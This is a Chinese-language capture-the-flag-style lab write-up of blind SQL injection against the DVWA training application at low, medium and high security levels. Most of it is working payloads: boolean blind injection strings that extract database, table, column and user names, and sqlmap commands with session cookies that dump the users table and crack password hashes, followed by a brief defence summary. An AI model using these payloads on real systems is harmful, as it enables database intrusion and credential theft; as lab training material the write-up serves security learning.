sql盲注
low级别
先提交个参数,发现执行成功就是回显时只是说这个id存在数据库,没有回显出id具体信息,怪不得叫盲注。
分析源码没有对所提交参数id做任何处理就直接执行了,只是回显的时候被隐藏了。
其实也可以通过ascaii码来一个一个字符弄出来,输入1’ and length(database())=1#,显示User ID is MISSING from the database.
输入1’ and length(database())=2#,显示User ID is MISSING from the database.
输入1’ and length(database())=3#,显示User ID is MISSING from the database.
输入1’ and length(database())=4#,显示User ID exists in the database.
说明数据库名长度为4.
数据库名:
输入1’ and ascii(substr(database(),1,1))>97#,显示User ID exists in the database.,说明第一个字符的ascii值大于97(a)
输入1’ and ascii(substr(database(),1,1))<122#,显示User ID exists in the database.,说明第一个字符的ascii值小于122(z)
输入1’ and ascii(substr(database(),1,1))<110#,显示User ID exists in the database.,说明第一个字符的ascii值小于110(n)
输入1’ and ascii(substr(database(),1,1))<104#,显示User ID exists in the database.,说明第一个字符的ascii值小于104(h)
输入1’ and ascii(substr(database(),1,1))<100#,显示User ID is MISSING from the database.
,说明第一个字符的ascii值不小于100(d)
输入1’ and ascii(substr(database(),1,1))>100#,显示User ID is MISSING from the database.
,说明第一个字符的ascii值不大于100(d)
输入1’ and ascii(substr(database(),1,1))=100#,显示User ID exists in the database.
,说明第一个字符的ascii值等于100(d)
根据上述二分法最终得到数据库名为dvwa。
但是这样太麻烦,直接sqlmap 莽就完事了,懂得利用工具才是人,冲就完事了
发现有两个类型的注入漏洞,一个是基于布尔的,一个是基于时间的
然后用–dbs ,遍历出全部数据库pyload:sqlmap -u “http://192.168.60.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7vfeeee0bd1pd8ia10vqs1o3q4” --dbs
查看当前数据库pyload:sqlmap -u “http://192.168.60.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7vfeeee0bd1pd8ia10vqs1o3q4” --current-db
知道数据库直接继续冲有什么表pyload:sqlmap -u “http://192.168.60.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7vfeeee0bd1pd8ia10vqs1o3q4” -D dvwa --tables
然后看看表里属性的信息pyload:sqlmap -u “http://192.168.60.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=7vfeeee0bd1pd8ia10vqs1o3q4” -D dvwa -T users --columns
接着直接看见user和password就直接莽内容
pyload:sqlmap -u “http://192.168.60.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=56ohejeqpp84475jdbun08fsv4” -D dvwa -T users --dump
因为密码有哈希值他问我要不要直接用他的字典爆破,其实用不用无所谓自己查也可以,懒点就点yes,摆烂直接自动破解,结果如图,只爆破出两个,不过也够了。
medium级别
查看源码是数字型注入,还有一个过滤特殊符号的函数,其实也可以拿工具冲。
首先抓个包复制http请求包到文件sql.txt里,然后直接用sqlmap冲,
直接把漏洞爆破出来了
摸下数据库pyload:sqlmap -r sql.txt --current-db 后面都是输命令就行,不多演示。
high级别
分析源码发现限制了输出行数为一行,而且失败时 当他随机生成的数等于3就会随机休眠2-4秒,目的是干扰基于时间的盲注
继续用sqlmap莽,先把包搞里头
然后发现莽不动了,那只能用手工了,因为时间盲注被限制了,只能用布尔盲注,ascll码慢慢冲
用手工的方式,基本思路:count确定数量,length()函数确定长度,然后用ascii码substr截取比较排除,这里一般用二分法。
前面low级别已经手工冲出数据库为dvwa,接下来冲表
先确定好数据库里有几个表
pyload:1’ and (select count(table_name) from information_schema.tables where table_schema=database())=1 #显示 MISSING
pyload:1’ and (select count(table_name) from information_schema.tables where table_schema=database())=2#显示 exists
可知道表的个数为2
接下来猜表名信息
1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) =1#显示 MISSING
1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) =9#显示 exists
可知表名长度为9
猜表的字符
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) >100#显示 exists
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) >103# 显示MISSING
1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) =103#显示 exists
可知为第一个字符为g
依照猜解第一个表的第一个字符,我们就可以同理猜解出第二个,第三个,一直到第九个,最后,这第一个表名为guestsbook
同理再来猜解第二个表的长度和表名:最后得出第二个表的长度为5,表明为users
接着是猜字段,一样的原理,先搞数量然后,长度,然后字符
数量pyload:1’ and (select count(column_name) from information_schema.columns where table_name=‘users’)=11
得数量为11
长度pyload:1’ and length((select column_name from information_schema.columns where table_name=‘users’ limit 0,1))=7 #
得第一个字符串长度为7
字符pyload:1’ and ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))=117 #
得第一个字符串的第一个字符为u,紧接着,同理我们可以猜出第二个,第三个,一直到第七个字符
最后猜解出users表的第一个字段的字段名是user_id
同理我们也可以猜出第二个,第三个,第四个直到第十一个字段名是first_name,ast_name,user,password,avatar,last_login,failed_login,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
接着是表内容
数量pyload:1’ and ((select count(user) from users ))=5
得数量为5
长度pyload:1’ and length((select user from users limit 0,1))=5 #
得第一个字符串长度为5
字符pyload:1’ and ascii(substr((select user from users limit 0,1),1,1))=97 #
得第一个字符串的第一个字符为a
依次得第一个字符串为admin
总结
漏洞原理:关于sql一般有基于时间的盲注和基于布尔的盲注,归根结底还是参数处理没做好转义
方法:基于时间的盲注和基于布尔的盲注
防御:
1.通过waf sql限制策略
2.预处理+参数化
3.对特殊字符做转义,限制
4.对于基于时间的可以用sleep函数干扰
的第一个字符为a
依次得第一个字符串为admin